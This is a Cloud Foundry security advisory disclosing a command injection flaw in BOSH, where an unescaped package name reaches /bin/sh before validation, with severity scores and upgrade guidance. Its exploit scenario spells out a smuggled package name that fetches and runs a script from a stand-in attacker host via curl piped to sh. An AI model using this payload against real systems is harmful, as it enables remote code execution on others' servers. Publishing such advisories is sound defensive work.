Severity

CVSSv4: High 8.7 

CVSS:4.0: (/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)
CVSSv3: High 8.2 (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) 

Vendor

Cloud Foundry Foundation

Versions Affected

*Severity is HIGH unless otherwise noted.

BOSH

– All versions prior to v282.1.12

Description

PackagePersister.validate_tgz builds “tar -tf #{tgz} 2>&1” where tgz = File.join(release_dir, ‘packages’, “#{name}.tgz”) and name = package_meta[‘name’] comes directly from release.MF inside the uploaded tarball. The string is passed to Bosh::Common::Exec.sh, which executes via %x{} — i.e., /bin/sh -c. No Shellwords.escape is applied. The Models::Package Sequel validation (VALID_ID = /^[-0-9A-Za-z_+.]+$/i) would reject the name, but in create_package (lines 74–79) the shell-out in save_package_source_blob runs before package.save, so validation fires too late. 

Exploit scenario 

Attacker crafts a release tarball whose release.MF lists a package named x;curl attacker.example/s|sh #. Attacker POST /releases (multipart or remote URL). The update_release worker reaches validate_tgz, which executes tar -tf

/tmp/…/packages/x;curl attacker.example/s|sh #.tgz 2>&1 under /bin/sh -c. The second statement runs regardless of whether the file exists. 

Preconditions 

• Attacker holds bosh.releases.upload (or bosh.admin) 
• New package with unique fingerprint so the create_package path is taken 

Mitigation

Users of affected products are strongly encouraged to follow the mitigations below.

The Cloud Foundry project recommends upgrading the following releases:

BOSH

– Upgrade deployed BOSH directors to v282.1.12 or greater

Credit

n/a

History

Initial vulnerability report published June 2nd 2026